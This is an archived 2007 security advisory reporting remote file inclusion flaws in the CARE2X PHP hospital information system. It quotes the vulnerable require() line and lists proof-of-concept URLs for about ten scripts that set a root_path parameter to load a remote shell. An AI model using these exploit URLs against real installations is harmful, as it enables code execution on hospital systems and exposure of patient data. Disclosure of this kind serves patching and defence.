CARE2X php Integ Hospital Info System 2G Deployment 2.2 Multi Remote File Include

2007-09-11T00:00:00
ID SECURITYVULNS:DOC:17960
Type securityvulns
Reporter Securityvulns
Modified 2007-09-11T00:00:00

Description

X---- w w w . u N k n 0 w n . e u ----X

CARE2X php Integ Hospital Info System 2G Deployment 2.2 Multi Remote File Include

::Home: http://care2x.org/ http://sourceforge.net/projects/care2002/

::Vuln Type : Remote File Include (RFI)

::Discovered by : iNs

::Vuln Code: /language/en/en_copyrite.php

<?php require($root_path.'include/inc_credits_openwin.php');

PoC: /language/en/en_copyrite.php?root_path=shell?? /language/vi/vi_copyrite.php?root_path=shell?? /language/ar/ar_copyrite.php?root_path=shell?? /include/care_api_classes/class_access.php?root_path=shell?? /include/care_api_classes/class_department.php?root_path=shell?? /include/care_api_classes/class_config.php?root_path=shell?? /include/care_api_classes/class_image.php?root_path=shell?? /include/care_api_classes/class_ward.php?root_path=shell?? /include/care_api_classes/class_product.php?root_path=shell?? /gui/smarty_template/smarty_care.class.php?root_path=shell??

And maybe others...

:: iNs @ uNkn0wn.eu ::

::Gr33tz t0: uNkn0wn.eu - iD - Stel128 - Spitfire - fEaRz - R1der - Stranger21 - nexos - sh4m4n - Svarshik DRT Memb3rz - s[H]4g - deL - l10m - l1l - r00tm1nd - f|_|ck3r - p1mmy ActiveSpy - r100z - The_PitBull - MaxDeMon - SancheZ - r0x00k - str0ke